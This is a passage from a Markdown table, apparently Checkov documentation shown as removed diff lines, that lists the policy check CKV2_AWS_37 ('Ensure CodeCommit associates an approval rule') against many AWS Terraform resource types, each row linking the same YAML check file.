rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 993 | CKV2_AWS_37 | resource | aws_cognito_user_pool_domain | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 994 | CKV2_AWS_37 | resource | aws_config_aggregate_authorization | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 995 | CKV2_AWS_37 | resource | aws_config_config_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 996 | CKV2_AWS_37 | resource | aws_config_configuration_aggregator | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 997 | CKV2_AWS_37 | resource | aws_config_configuration_recorder | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 998 | CKV2_AWS_37 | resource | aws_config_configuration_recorder_status | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 999 | CKV2_AWS_37 | resource | aws_config_delivery_channel | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1000 | CKV2_AWS_37 | 
resource | aws_config_organization_custom_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1001 | CKV2_AWS_37 | resource | aws_config_organization_managed_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1002 | CKV2_AWS_37 | resource | aws_cur_report_definition | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1003 | CKV2_AWS_37 | resource | aws_customer_gateway | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1004 | CKV2_AWS_37 | resource | aws_datapipeline_pipeline | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1005 | CKV2_AWS_37 | resource | aws_datasync_agent | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1006 | CKV2_AWS_37 | resource | aws_datasync_location_efs | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1007 | CKV2_AWS_37 | resource | aws_datasync_location_nfs | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1008 | CKV2_AWS_37 | resource | aws_datasync_location_s3 | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1009 | CKV2_AWS_37 | resource | aws_datasync_location_smb | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1010 | CKV2_AWS_37 | resource | aws_datasync_task | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1011 | CKV2_AWS_37 | resource | aws_dax_cluster | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1012 | CKV2_AWS_37 | resource | aws_dax_parameter_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1013 | CKV2_AWS_37 | resource | aws_dax_subnet_group | Ensure CodeCommit 
associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1014 | CKV2_AWS_37 | resource | aws_db_cluster_snapshot | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1015 | CKV2_AWS_37 | resource | aws_db_event_subscription | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1016 | CKV2_AWS_37 | resource | aws_db_instance | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1017 | CKV2_AWS_37 | resource | aws_db_instance_role_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1018 | CKV2_AWS_37 | resource | aws_db_option_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1019 | CKV2_AWS_37 | resource | aws_db_parameter_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1020 | CKV2_AWS_37 | resource | aws_db_security_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1021 | CKV2_AWS_37 | resource | aws_db_snapshot | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1022 | CKV2_AWS_37 | resource | aws_db_subnet_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1023 | CKV2_AWS_37 | resource | aws_default_network_acl | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1024 | CKV2_AWS_37 | resource | aws_default_route_table | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1025 | CKV2_AWS_37 | resource | aws_default_security_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1026 | CKV2_AWS_37 | resource | aws_default_subnet | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1027 | CKV2_AWS_37 | resource | aws_default_vpc | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1028 | CKV2_AWS_37 | resource | aws_default_vpc_dhcp_options | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1029 | CKV2_AWS_37 | resource | aws_devicefarm_project | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1030 | CKV2_AWS_37 | resource | aws_directory_service_conditional_forwarder | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1031 | CKV2_AWS_37 | resource | aws_directory_service_directory | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1032 | CKV2_AWS_37 | resource | aws_directory_service_log_subscription | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1033 | CKV2_AWS_37 | resource | aws_dlm_lifecycle_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1034 | CKV2_AWS_37 | resource | aws_dms_certificate | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1035 | CKV2_AWS_37 | resource | aws_dms_endpoint | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1036 | CKV2_AWS_37 | resource | aws_dms_event_subscription | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1037 | CKV2_AWS_37 | resource | aws_dms_replication_instance | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1038 | CKV2_AWS_37 | resource | aws_dms_replication_subnet_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1039 | CKV2_AWS_37 | resource | aws_dms_replication_task | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1040 | CKV2_AWS_37 | resource | aws_docdb_cluster | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1041 | CKV2_AWS_37 | resource | aws_docdb_cluster_instance | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1042 | CKV2_AWS_37 | resource | aws_docdb_cluster_parameter_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1043 | CKV2_AWS_37 | resource | aws_docdb_cluster_snapshot | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1044 | CKV2_AWS_37 | resource | aws_docdb_subnet_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1045 | CKV2_AWS_37 | resource | aws_dx_bgp_peer | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1046 | CKV2_AWS_37 | resource | aws_dx_connection | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1047 | CKV2_AWS_37 | resource | aws_dx_connection_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1048 | CKV2_AWS_37 | resource | aws_dx_gateway | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1049 | CKV2_AWS_37 | resource | aws_dx_gateway_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1050 | CKV2_AWS_37 | resource | aws_dx_gateway_association_proposal | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1051 | CKV2_AWS_37 | resource | aws_dx_hosted_private_virtual_interface | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1052 | CKV2_AWS_37 | resource | aws_dx_hosted_private_virtual_interface_accepter | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1053 | CKV2_AWS_37 | resource | aws_dx_hosted_public_virtual_interface | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1054 | CKV2_AWS_37 | resource | aws_dx_hosted_public_virtual_interface_accepter | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1055 | CKV2_AWS_37 | resource | aws_dx_hosted_transit_virtual_interface | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1056 | CKV2_AWS_37 | resource | aws_dx_hosted_transit_virtual_interface_accepter | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1057 | CKV2_AWS_37 | resource | aws_dx_lag | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1058 | CKV2_AWS_37 | resource | aws_dx_private_virtual_interface | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1059 | CKV2_AWS_37 | resource | aws_dx_public_virtual_interface | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1060 | CKV2_AWS_37 | resource | aws_dx_transit_virtual_interface | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1061 | CKV2_AWS_37 | resource | aws_dynamodb_global_table | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1062 | CKV2_AWS_37 | resource | aws_dynamodb_table | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1063 | CKV2_AWS_37 | resource | aws_dynamodb_table_item | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1064 | CKV2_AWS_37 | resource | aws_ebs_default_kms_key | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1065 | CKV2_AWS_37 | resource | aws_ebs_encryption_by_default | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1066 | CKV2_AWS_37 | resource | aws_ebs_snapshot | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1067 | CKV2_AWS_37 | resource | aws_ebs_snapshot_copy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1068 | CKV2_AWS_37 | resource | aws_ebs_volume | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1069 | CKV2_AWS_37 | resource | aws_ec2_availability_zone_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1070 | CKV2_AWS_37 | resource | aws_ec2_capacity_reservation | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1071 | CKV2_AWS_37 | resource | aws_ec2_client_vpn_authorization_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1072 | CKV2_AWS_37 | resource | aws_ec2_client_vpn_endpoint | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1073 | CKV2_AWS_37 | resource | aws_ec2_client_vpn_network_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1074 | CKV2_AWS_37 | resource | aws_ec2_client_vpn_route | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1075 | CKV2_AWS_37 | resource | aws_ec2_fleet | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1076 | CKV2_AWS_37 | resource | aws_ec2_local_gateway_route | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1077 | CKV2_AWS_37 | resource | aws_ec2_local_gateway_route_table_vpc_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1078 | CKV2_AWS_37 | resource | aws_ec2_tag | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1079 | CKV2_AWS_37 | resource | aws_ec2_traffic_mirror_filter | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1080 | CKV2_AWS_37 | resource | aws_ec2_traffic_mirror_filter_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1081 | CKV2_AWS_37 | resource | aws_ec2_traffic_mirror_session | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1082 | CKV2_AWS_37 | resource | aws_ec2_traffic_mirror_target | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1083 | CKV2_AWS_37 | resource | aws_ec2_transit_gateway | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1084 | CKV2_AWS_37 | resource | aws_ec2_transit_gateway_peering_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1085 | CKV2_AWS_37 | resource | aws_ec2_transit_gateway_peering_attachment_accepter | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1086 | CKV2_AWS_37 | resource | aws_ec2_transit_gateway_route | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1087 | CKV2_AWS_37 | resource | aws_ec2_transit_gateway_route_table | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1088 | CKV2_AWS_37 | resource | aws_ec2_transit_gateway_route_table_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1089 | CKV2_AWS_37 | resource | aws_ec2_transit_gateway_route_table_propagation | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1090 | CKV2_AWS_37 | resource | aws_ec2_transit_gateway_vpc_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1091 | CKV2_AWS_37 | resource | aws_ec2_transit_gateway_vpc_attachment_accepter | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1092 | CKV2_AWS_37 | resource | aws_ecr_lifecycle_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1093 | CKV2_AWS_37 | resource | aws_ecr_repository | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1094 | CKV2_AWS_37 | resource | aws_ecr_repository_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
